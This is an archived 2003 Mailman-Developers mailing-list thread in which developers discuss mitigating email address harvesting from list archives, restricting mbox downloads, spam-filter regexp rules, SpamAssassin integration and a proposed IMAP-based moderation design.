email address harvesting exploit In-Reply-To: Message from Richard Barrett of "Sat, 29 Nov 2003 14:40:48 GMT." <059F1F1D-227A-11D8-89F4-000A957C9A50@openinfo.co.uk> References: <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> <17629.1070066939@kanga.nu> <6E17C24A-223B-11D8-89F4-000A957C9A50@openinfo.co.uk> <5060.1070112737@kanga.nu> <059F1F1D-227A-11D8-89F4-000A957C9A50@openinfo.co.uk> Message-ID: <10972.1070117738@kanga.nu> On Sat, 29 Nov 2003 14:40:48 +0000 Richard Barrett wrote: > On 29 Nov 2003, at 13:32, J C Lawrence wrote: >> On Sat, 29 Nov 2003 07:12:45 +0000 Richard Barrett >> wrote: >>> On 29 Nov 2003, at 00:48, J C Lawrence wrote: >> For me, and (possibly) for Mailman v3, critical. I use Message IDs >> as a primary key for my list archives, indexing and several other >> bits. Changing them, at any point, breaks that. > I confess I was not gazing that far into the future and, not being a > Mailman developer, have no influence or knowledge of the architecture > of Mailman v3. This area was discussed on this list extensively a few weeks ago. I suggest reading the archives. > However, offering an immediate fix for an arguably valid criticism of > the current stable release that would not have a major destabilizing > effect on that stable release seems worthwhile to me. Fair dinkum, and I've not argued otherwise. > It seems from what you say that your archiving and indexing solution > is not standard Mailman internal pipermail archiving so the poor fit > of the solution offered with your system is unsurprising. The archiving system I use is also what I've advocated for Mailman v3, with some level of buy-in. > Bear in mind that the patch only affects the data delivered in > response to HTTP requests. Right, one of the levels I use Message IDs is the user-level, in HTML, in archives, in URLs, and in raw messages. Users regularly quote Message IDs in their messages as text strings ala: Have a look at message 059F1F1D-227A-11D8-89F4-000A957C9A50@openinfo.co.uk as it goes into this area further and explains several of the bits you are asking about. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From r.barrett at openinfo.co.uk Sat Nov 29 14:43:48 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Sat Nov 29 14:43:59 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <10972.1070117738@kanga.nu> References: <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> <17629.1070066939@kanga.nu> <6E17C24A-223B-11D8-89F4-000A957C9A50@openinfo.co.uk> <5060.1070112737@kanga.nu> <059F1F1D-227A-11D8-89F4-000A957C9A50@openinfo.co.uk> <10972.1070117738@kanga.nu> Message-ID: <59FA8D94-22A4-11D8-89F4-000A957C9A50@openinfo.co.uk> On 29 Nov 2003, at 14:55, J C Lawrence wrote: > On Sat, 29 Nov 2003 14:40:48 +0000 > Richard Barrett wrote: >> On 29 Nov 2003, at 13:32, J C Lawrence wrote: >>> On Sat, 29 Nov 2003 07:12:45 +0000 Richard Barrett >>> wrote: >>>> On 29 Nov 2003, at 00:48, J C Lawrence wrote: > >>> For me, and (possibly) for Mailman v3, critical. I use Message IDs >>> as a primary key for my list archives, indexing and several other >>> bits. Changing them, at any point, breaks that. > >> I confess I was not gazing that far into the future and, not being a >> Mailman developer, have no influence or knowledge of the architecture >> of Mailman v3. > > This area was discussed on this list extensively a few weeks ago. I > suggest reading the archives. Hey, I just produced a quick hack and if you do not like the patch then do not use it. If you have not twigged it yet, all of my Mailman patches are to address here and now issues, either bugs or functionality requirements, in the current stable release. Talking of functionality that is months ahead is not my purpose as I know that Mailman developers are not interested in my input about major new releases. > >> However, offering an immediate fix for an arguably valid criticism of >> the current stable release that would not have a major destabilizing >> effect on that stable release seems worthwhile to me. > > Fair dinkum, and I've not argued otherwise. It was square bunkum when I lived in oz. But by pressing on the v3 issues that is precisely what you are doing. The value of this patch is now and maybe acitvating it is only worthwhile for some of the MM user community. The working assumption has to be that any decent major redesign of MM will obsolete it. > >> It seems from what you say that your archiving and indexing solution >> is not standard Mailman internal pipermail archiving so the poor fit >> of the solution offered with your system is unsurprising. > > The archiving system I use is also what I've advocated for Mailman v3, > with some level of buy-in. Congratulations. None of my maintained patches for current Mailman stable releases have a place in to Mailman's future but as they meet my current needs I am happy to publish them for users to make their own choice. I'm equally happy to stop if nobody else wants them or when I no longer have need of them myself. Maybe, hopefully, v3 MM will fix certain issues so that I will not have expend effort in the future. > >> Bear in mind that the patch only affects the data delivered in >> response to HTTP requests. > > Right, one of the levels I use Message IDs is the user-level, in HTML, > in archives, in URLs, and in raw messages. Users regularly quote > Message IDs in their messages as text strings ala: > > Have a look at message > 059F1F1D-227A-11D8-89F4-000A957C9A50@openinfo.co.uk as it goes into > this area further and explains several of the bits you are asking > about. > You really are too clever for me. As I said, if patch doesn't fit do not use it. I do not much care one way or the other. My patch can fester on sourceforge, not being incorporated into Mailman, until it is obsolete and I shall not lose a minutes sleep about that. > -- > J C Lawrence > ---------(*) Satan, oscillate my metallic sonatas. > claw@kanga.nu He lived as a devil, eh? > http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. > ----------------------------------------------------------------------- Richard Barrett http://www.openinfo.co.uk From claw at kanga.nu Sat Nov 29 20:31:06 2003 From: claw at kanga.nu (J C Lawrence) Date: Sat Nov 29 20:31:12 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: Message from Richard Barrett of "Sat, 29 Nov 2003 19:43:48 GMT." <59FA8D94-22A4-11D8-89F4-000A957C9A50@openinfo.co.uk> References: <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> <17629.1070066939@kanga.nu> <6E17C24A-223B-11D8-89F4-000A957C9A50@openinfo.co.uk> <5060.1070112737@kanga.nu> <059F1F1D-227A-11D8-89F4-000A957C9A50@openinfo.co.uk> <10972.1070117738@kanga.nu> <59FA8D94-22A4-11D8-89F4-000A957C9A50@openinfo.co.uk> Message-ID: <22510.1070155866@kanga.nu> On Sat, 29 Nov 2003 19:43:48 +0000 Richard Barrett wrote: > On 29 Nov 2003, at 14:55, J C Lawrence wrote: >> On Sat, 29 Nov 2003 14:40:48 +0000 Richard Barrett >> wrote: > ... I know that Mailman developers are not interested in my input > about major new releases. I have no reason to believe that. >>> However, offering an immediate fix for an arguably valid criticism >>> of the current stable release that would not have a major >>> destabilizing effect on that stable release seems worthwhile to me. >> Fair dinkum, and I've not argued otherwise. > It was square bunkum when I lived in oz. I heard and used both in my time there (Qld and NSW, 70's and mid 80's). > But by pressing on the v3 issues that is precisely what you are > doing. No. I've made no comment or assertion regarding v2 impacts. You appear to consider yourself attacked. You haven't been attacked. Rather I've stated an undocumented impact of your patch which is significant to certain deployments. > You really are too clever for me. EOT. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From colinp at waikato.ac.nz Sun Nov 30 15:45:51 2003 From: colinp at waikato.ac.nz (Colin Palmer) Date: Sun Nov 30 15:45:58 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <1069992315.19968.8.camel@anthem> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> <1069992315.19968.8.camel@anthem> Message-ID: <1070225151.9768.113.camel@firefox.cc.waikato.ac.nz> On Fri, 2003-11-28 at 17:05, Barry Warsaw wrote: > On Fri, 2003-11-28 at 06:26, Colin Palmer wrote: > > (then you just need to add an ACL to the webserver to stop someone > > downloading the listname.mbox file that has all the unmunged addresses > > still in it) > I'd consider turning this off for 2.1.4 if people agree. Perhaps making > it available only through a site config var. I'm not sure how easy that > is, but it seems important enough to close off access to the mbox file. Maybe just have ARCHIVE_TO_MBOX default to 0? I deliberately want Mailman to keep creating mbox archives in case I want to regenerate the list archives completely using a newer version of HyperArch, or switch to something else entirely, I just don't want to offer them for download, so having them created outside of /pipermail/ if they are turned on would be nice, but not an urgent thing since it's easy enough to block access at the webserver. -- Colin Palmer University of Waikato, ITS Division From barry at python.org Sun Nov 30 17:05:08 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:05:21 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: <12573.1069951374@kanga.nu> References: <1069878824.4190.36.camel@ron> <20031127084723.GA55070@gewis.win.tue.nl> <1069947987.8426.6.camel@anthem> <12573.1069951374@kanga.nu> Message-ID: <1070078458.25034.66.camel@geddy> On Thu, 2003-11-27 at 11:42, J C Lawrence wrote: > First thought: > > Discard message on > Hold message on > Accept message on > > Where the regex fields are in fact lists of regexes. Given such support > it is fairly simple to define regexes which match SpamAssassin headers > of value X and above/below for the relevant entries, or SpamBayes or > whatever. Here are some strawman ideas for y'all to knock down. :) I'm thinking for the next version that we want to be able to set up a list of rules which can be added, removed, or moved up or down. Each rule has a condition and an action. As a model, think something like Evolution's filter u/i. Everything that's currently defined in Hold.py and Moderate.py would instead define a rule, such as "If matches regular expressions", or "If moderated member", or "if size greater than". The actions would by default include such things as reject, hold, discard, but it could be other things like 'scrub', e.g. "if contains text/html, scrub". There would also be actions like "stop processing", or "save to folder". Let me blue sky a little bit. ;) To address Simone's suggestion of saving a pristine copy, and to support Spambayes training, I'm thinking that if Mailman had a (limited) IMAP interface, we could use special folders to provide functionality and instruct Mailman on actions to take. Imagine that each list had the following IMAP folders: * Pristine - unadulterated copies of the message as Mailman received them from the MTA. * Held - Messages held for moderator approval * Approved - Moving messages from Held to Approved would instruct Mailman to allow the message to pass to the list * Spam - messages matching a spam score * Unsure - message that are not quite ham, not quite spam * Preserve - messages the moderator wants to preserve for future reference. * SpamTrain, HamTrain - messages used to train (or retrain) a bayesian type classifier Maybe there's more, maybe different names. The point is that messages end up in the folders because of rule actions, but some folders are scanned by Mailman to take actions on the messages. Now, we'd have to protect these folders by only allowing admin or moderator login (probably over imaps if available), and there'd be some size or time limit on the messages in the folders. E.g. you couldn't preserve more than xMB of messages, or spam would get automatically discarded after x days. The other important point is that you would use a real mail reader to access this information (and no, we wouldn't do POP). I'm strongly of the opinion that I really want to deal with messages uses existing tools that already know how to deal with email. Lots of interesting questions then -- do we provide IMAP access for non-admins? (I think not, that's what NNTP access is for). Also, for admins who just can't use IMAP, we'd need to provide /some/ web interface for them to deal with things. I suspect it'll be clunky no matter how much Javascript we throw at it , but thems the breaks. All this is pie-in-the-sky and doesn't much help Jeff for the 2.1 (or even 2.x ) branch. So practically speaking, I'd keep it simple. Work off the cvs head since even the following would have to be a MM2.2 feature: expand the existing Privacy->Spam Filters page to take a list of regular expressions, with an action for each one. As a model, use the Topics widgets idea, which always adds a new blank one when you submit a new topic filter. You'd probably also want to add Up and Down buttons. -Barry From barry at python.org Sun Nov 30 17:05:08 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:05:24 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: <1069958082.14780.14.camel@ron> References: <1069878824.4190.36.camel@ron> <20031127084723.GA55070@gewis.win.tue.nl> <1069958082.14780.14.camel@ron> Message-ID: <1070078817.25034.73.camel@geddy> On Thu, 2003-11-27 at 13:34, Jeff Warnica wrote: > Unless I wanted to hack up that subsystem so that the choices a > moderator had were based on how the message got there, I guess its just > a matter of having another canned error message. Its not much of a > difference either way as far as code goes. Oh, let me add a few other things... I would implement a Handler module with a fairly generic class in it. The class has a method that accepts a message, and returns the message with some spam header added. I believe SA has a client/server interface to it, and I know SB does, so this method would probably be fairly similar for both systems (specialize it by derivation and overriding of this method). Then, in the handler module, you could instantiate zero or more instances of this class (say if you wanted both SB and SA) and define some ordering, probably via an mm_cfg variable. Now, the handler module exposes a process() method that's basically a shim to pass the message to the filter method of each of the above instantiated classes. >From here, the regexp matching bit I talked about earlier would simply match on the header added by SA or SB, and then take the action. -Barry From barry at python.org Sun Nov 30 17:05:09 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:05:29 2003 Subject: [Mailman-Developers] back to square one In-Reply-To: References: Message-ID: <1070079610.25034.87.camel@geddy> On Fri, 2003-11-21 at 08:46, Dale Newfield wrote: > On Thu, 20 Nov 2003, Brett Dikeman wrote: > > The only error we're getting is every 15 minutes: > > Nov 20 22:02:55 2003 (18412) No such list "[list": > > ...with one space after the : > > > I've been unsuccessful in tracking down where that could possibly be > > coming from.... > > That message might come from any of these cgi accesses: > > ./Mailman/Cgi/admindb.py: syslog('error', 'No such list "%s": %s\n', listname, e) > ./Mailman/Cgi/confirm.py: syslog('error', 'No such list "%s": %s', listname, e) > ./Mailman/Cgi/edithtml.py: syslog('error', 'No such list "%s": %s', listname, e) > ./Mailman/Cgi/listinfo.py: syslog('error', 'No such list "%s": %s', listname, e) > ./Mailman/Cgi/options.py: syslog('error', 'No such list "%s": %s\n', listname, e) > ./Mailman/Cgi/private.py: syslog('error', 'No such list "%s": %s\n', listname, e) > ./Mailman/Cgi/rmlist.py: syslog('error', 'No such list "%s": %s\n', listname, e) > ./Mailman/Cgi/subscribe.py: syslog('error', 'No such list "%s": %s\n', listname, e) I suspect the error message he's seeing is unrelated to his performance problem (not positive about that though). > Is it precisely every 15 minutes? If so it sounds more like a cron job... As I mentioned to Brett in pvt email, it could also be the BounceRunner that's hosing things. By default, every 15 minutes it processes any queued bounces, and if these were bounces to the site list, it will lock every list on the system to register the bounce. If he's getting tons of bounces, or there's some bug that causes the BounceRunner to crash (or the Python process to core dump???), he could be leaving stale locks around that would wedge his lists. There should be some evidence of this in the logs/bounce file, or in stale locks in the lock directory. He could also fiddle with the REGISTER_BOUNCES_EVERY variable in BounceRunner.py to see if that corresponds to the length of time until he's hosed. If that turns out to be the case, then we'll need to investigate further to find out what's giving his bounce runner grief. -Barry From barry at python.org Sun Nov 30 17:05:10 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:05:34 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? In-Reply-To: <20031104180416.40dec963.kyrian-list@ore.org> References: <20031104180416.40dec963.kyrian-list@ore.org> Message-ID: <1070080507.25034.100.camel@geddy> On Tue, 2003-11-04 at 13:04, Kyrian wrote: > The only major problem I have is the return types for > {get,set}DeliveryStatus. I can't work out how I'm suppose to return a > tuple of values, and what they should be. Actually, these methods don't return tuples. In OldStyleMemberships.py, the underlying data structure records the change time and stores this as a tuple in the appropriate dictionary. You wouldn't need to do that. E.g. you could use a Timestamp column that gets automatically updated at any change. Then you'd just return this column for in the getDeliveryStatusChange() method. -Barry From barry at python.org Sun Nov 30 17:05:11 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:05:43 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: <20031116160229.GA92340@gewis.win.tue.nl> References: <1068602871.22989.38.camel@ron> <20031116160229.GA92340@gewis.win.tue.nl> Message-ID: <1070115785.25034.112.camel@geddy> On Sun, 2003-11-16 at 11:02, PieterB wrote: > It would be great if a SpamAssassin.py will be integrated in Mailman > 2.1.4! Can anybody commit this SpamAssassin.py and James his spamd.py > to the Mailman CVS? 2.1.4 has to be a pure(r) bug fix release. -Barry From barry at python.org Sun Nov 30 17:05:12 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:05:48 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: References: Message-ID: <1070116106.25034.117.camel@geddy> On Mon, 2003-11-17 at 17:52, Richard Barrett wrote: > Might I ask why enthusiasts for integration SpamAssassin with Mailman > do not care about delivery of spam to other mail aliases in their > domain. And if they do so care, why do they not concentrate on stopping > spam reaching all of their mail aliases. > > I guess I cannot understand why you are messing around integrating > SpammAssassin with Mailman when you should be integrating it with your > MTA so that the spam never gets anywhere near Mailman. > > Or did I miss something important along the way. We do this on python.org, although we use Spambayes instead of SpamAssassin. Still, anything that scores as very high spam gets rejected at SMTP time, which is nice because then the spammer has to spend a little bit of effort to deal with it. I'm not aware of any false positives in quite a long time. However, message that score Unsure will get tagged and forwarded. It's useful for Mailman to have some regexp checks on spam headers so individual list owners can decide whether they'll accept a lower threshold for spam (at the expense of higher false positives). -Barry From barry at python.org Sun Nov 30 17:05:12 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:05:52 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: <1070115785.25034.112.camel@geddy> References: <1068602871.22989.38.camel@ron> <20031116160229.GA92340@gewis.win.tue.nl> <1070115785.25034.112.camel@geddy> Message-ID: <1070116573.25034.123.camel@geddy> On Sat, 2003-11-29 at 09:23, Barry Warsaw wrote: > > It would be great if a SpamAssassin.py will be integrated in Mailman > > 2.1.4! Can anybody commit this SpamAssassin.py and James his spamd.py > > to the Mailman CVS? > > 2.1.4 has to be a pure(r) bug fix release. Let me amend that: I could support an improved regexp filter of pre-tagged messages for 2.1.4. It would be up to some upstream process to tag the messages. The idea would be to improve Privacy->Spam Filters so that you could have multiple regexp rules, with a selectable disposition for each rule. You'd need an up/down button and a delete button for each rule. I'm betting you could adapt the topic filter widget to get this done. -Barry From barry at python.org Sun Nov 30 17:05:12 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:05:56 2003 Subject: [Mailman-Developers] New SpamAssassin handler on sf. In-Reply-To: <1070116573.25034.123.camel@geddy> References: <1068602871.22989.38.camel@ron> <20031116160229.GA92340@gewis.win.tue.nl> <1070115785.25034.112.camel@geddy> <1070116573.25034.123.camel@geddy> Message-ID: <1070133889.25034.125.camel@geddy> On Sat, 2003-11-29 at 09:36, Barry Warsaw wrote: > On Sat, 2003-11-29 at 09:23, Barry Warsaw wrote: > > > > It would be great if a SpamAssassin.py will be integrated in Mailman > > > 2.1.4! Can anybody commit this SpamAssassin.py and James his spamd.py > > > to the Mailman CVS? > > > > 2.1.4 has to be a pure(r) bug fix release. > > Let me amend that: I could support an improved regexp filter of > pre-tagged messages for 2.1.4. It would be up to some upstream process > to tag the messages. The idea would be to improve Privacy->Spam Filters > so that you could have multiple regexp rules, with a selectable > disposition for each rule. You'd need an up/down button and a delete > button for each rule. I'm betting you could adapt the topic filter > widget to get this done. Heh, okay I've done this. As soon as everything's checked in (I'm off-line as I'm writing this), please checkout the Release_2_1-maint branch of cvs and see if you like what I've done. -Barry From barry at python.org Sun Nov 30 17:40:46 2003 From: barry at python.org (Barry Warsaw) Date: Sun Nov 30 17:40:50 2003 Subject: [Mailman-Developers] Re: bugtraq submission warning: email address harvesting exploit In-Reply-To: <20031129013921.GA9121@dust.uchicago.edu> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> <1069992315.19968.8.camel@anthem> <20031129013921.GA9121@dust.uchicago.edu> Message-ID: <1070232046.1088.112.camel@geddy> On Fri, 2003-11-28 at 20:39, David Champion wrote: > I *really* value this ability, but I understand the arguments for not > making it downloadable. How hard would it be to avail it to subscribers, > but to restrict it to anonymous accessors? Probably more than I can realistically do for 2.1.4. However I did implement the ability for the site admin to turn off public mboxes. You'll see it after I catch up on all my turkey-induced hacking. -Barry From philb at philb.us Sun Nov 30 19:52:10 2003 From: philb at philb.us (Phil Barnett) Date: Sun Nov 30 19:52:15 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: <1070078458.25034.66.camel@geddy> References: <1069878824.4190.36.camel@ron> <12573.1069951374@kanga.nu> <1070078458.25034.66.camel@geddy> Message-ID: <200311301952.10809.philb@philb.us> On Sunday 30 November 2003 5:05 pm, Barry Warsaw wrote: > ?Also, for admins who just can't use IMAP, > we'd need to provide /some/ web interface for them to deal with things. Why not just integrate with IMP? Does what you want, requires no further coding. -- "The true measure of a man is how he treats someone who can do him absolutely no good." - Samuel Johnson (1709-1784) ? From claw at kanga.nu Sun Nov 30 20:18:40 2003 From: claw at kanga.nu (J C Lawrence) Date: Sun Nov 30 20:18:45 2003 Subject: [Mailman-Developers] GUI hacking for SA integration In-Reply-To: Message from Phil Barnett of "Sun, 30 Nov 2003 19:52:10 EST." <200311301952.10809.philb@philb.us> References: <1069878824.4190.36.camel@ron> <12573.1069951374@kanga.nu> <1070078458.25034.66.camel@geddy> <200311301952.10809.philb@philb.us> Message-ID: <20166.1070241520@kanga.nu> On Sun, 30 Nov 2003 19:52:10 -0500 Phil Barnett wrote: > On Sunday 30 November 2003 5:05 pm, Barry Warsaw wrote: >> Also, for admins who just can't use IMAP, we'd need to provide >> /some/ web interface for them to deal with things. > Why not just integrate with IMP? Does what you want, requires no > further coding. Adding IMP to the mix adds a very large, unrelated, and deployment-unfriendly set of dependencies to Mailman. There's also precious little need to involve yet another web scripting language with Mailman. Other notes: Twisted already supports IMAP4 at the protocol level. Pythonic IMAPd implementations appear to be thin on the ground. It also appears to be an unprofitable course to chase: IMAP is a vomit-inducing and non-trivial protocol. Using an external IMAPd implementation with hierarchal folder support (which I think they all support) is a relatively minor additional requirement, especially as given that it opens the possibility for: a) The IMAPd deployment to be on a different host b) Initial receipt of mail and injection into a an IMAP "queue" folder to occur on a different host than Mailman itself runs on, without Mailman's direct involvement (ie Mailman polls the status/contents of the queue folder periodically). c) For Mailman's queue runner to transparently execute on yet a third machine. All without NFS or other filesystem sharing/locking problems. IMAPd implementations already know how to handle locking and lock contention. ObNote: Some care would have to go to segmenting the Mailman account usage at the IMAP level to minimise lock contention. Which loosely sums to allowing segmentation of the Mailman processes and dependencies across hosts and across security domains (eg either side of firewalls/DMZs). This becomes especially interesting with things like external membership rosters (eg LDAP/SQL) which may reside on hosts/protocols with different security requirements than the rest of the mail system. I'm not sure I like the IMAP idea in toto. It is interesting, but also seems fragile as a design, as well as moving Mailman thoroughly away from the ideal-for-small/ignorant-sites model. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live.